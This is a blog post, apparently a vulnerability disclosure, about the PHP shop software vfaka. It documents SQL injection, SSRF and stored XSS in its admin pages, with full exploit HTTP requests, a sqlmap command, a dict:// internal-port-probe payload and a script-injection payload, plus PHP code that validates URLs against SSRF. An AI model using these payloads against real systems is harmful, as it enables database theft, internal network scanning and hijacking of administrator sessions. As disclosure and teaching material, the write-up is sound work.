vfaka

This article was last updated on the afternoon of March 4, 2026.


Test environment: localhost

windows+apache2+phpstorm+php7.3.4

SQL Injection Vulnerability

1. Vulnerability Analysis

Vulnerability file: /admin/wholesale.php

image-20260304161151462

After receiving the ‘id’ parameter, the code performs no prepared-statement binding or filtering and concatenates the value directly into the SQL statement, resulting in a SQL injection vulnerability.

Depending on the value of the “type” parameter, there are 11 such injection points.

image-20260304163142566

2. Vulnerability Exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct the payload:

GET /admin/wholesale.php?action=info&type=text&id=2 HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

Use sqlmap to verify the vulnerability.

sqlmap confirmed both a time-based blind and a boolean-based blind SQL injection.

sqlmap -r '/home/qfbsz/111/daima/vka/sql.txt' --batch -p id

image-20260304163040580

SSRF Vulnerability

1. Vulnerability Analysis

Vulnerability file: /admin/wholesale.php

image-20260304163352819

After receiving the url parameter, this code performs no security checks on it and passes it straight to the getbody function to make the request, resulting in an SSRF vulnerability.

2. Vulnerability Exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct the payload:

url=dict://127.0.0.1:3306

POST /admin/wholesale.php?action=list HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

url=dict://127.0.0.1:3306

image-20260304164234127

The internal network port (3306 in this payload) was successfully detected.
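As an added example (not vfaka's own code), this is how the url parameter could be validated before the request is made, so that the dict://127.0.0.1:3306 payload above is refused; the function names are hypothetical and fetch_validated() stands in for the application's getbody().

```php
<?php
// Added example, not vfaka's own code. Validates a user-supplied URL before it
// is fetched and rejects the url=dict://127.0.0.1:3306 payload shown above.
// Function names are hypothetical; fetch_validated() stands in for getbody().

// Globally routable addresses only. The two flags reject RFC 1918 ranges and
// reserved ranges, which include 127.0.0.0/8, ::1, 0.0.0.0/8 and 169.254.0.0/16.
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Returns the URL if it may be fetched, null otherwise.
function validate_fetch_url(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) return null;
    // Scheme allowlist: dict://, gopher://, file:// are never legitimate here.
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) return null;
    // Default ports only, so the parameter cannot double as a port scanner.
    if (isset($p['port']) && !in_array($p['port'], [80, 443], true)) return null;
    // Resolve the host and check every address, so a name that resolves to
    // 127.0.0.1 is rejected just like the literal loopback address.
    $host = trim($p['host'], '[]');
    $ips  = filter_var($host, FILTER_VALIDATE_IP) !== false ? [$host] : gethostbynamel($host);
    if (empty($ips)) return null;
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) return null;
    }
    return $url;
}

// Hardened fetch: curl is limited to http/https and does not follow redirects,
// which could otherwise bounce a validated public URL to 127.0.0.1.
function fetch_validated(string $url): ?string
{
    if (validate_fetch_url($url) === null) return null;
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,
        CURLOPT_TIMEOUT         => 5,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body === false ? null : $body;
}
```

gethostbynamel() returns only A records, so on IPv6-enabled hosts also check AAAA records (dns_get_record()) and pin the validated address with CURLOPT_RESOLVE; otherwise a second DNS lookup at fetch time can return a different address than the one that was checked.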

Stored Cross-Site Scripting vulnerability

1. Vulnerability Analysis

Vulnerability file: /admin/usort_add.php

image-20260304165741452

When the “S_title” parameter is read, neither the “add” nor the “edit” operation converts it to HTML entities; the value is concatenated directly into the JavaScript code.

image-20260304165827017

2. Vulnerability Exploitation

Payload:

S_title=<script>alert('xss')</script>
POST /admin/usort_add.php?action=add HTTP/1.1
Host: 192.168.190.1
Content-Length: 165
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.190.1
Referer: http://192.168.190.1/admin/usort_add.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

S_title=<script>alert('xss')</script>&S_sub=0&S_order=0&S_show=1&S_link_type=default&S_link_url=&S_pic=nopic.png&S_keywords=1&S_content=

image-20260304170922739

After refreshing the page, the XSS vulnerability was successfully triggered.

image-20260304170945235


vfaka
http://example.com/2026/03/04/vfaka/
Author: 清风
Published on: March 4, 2026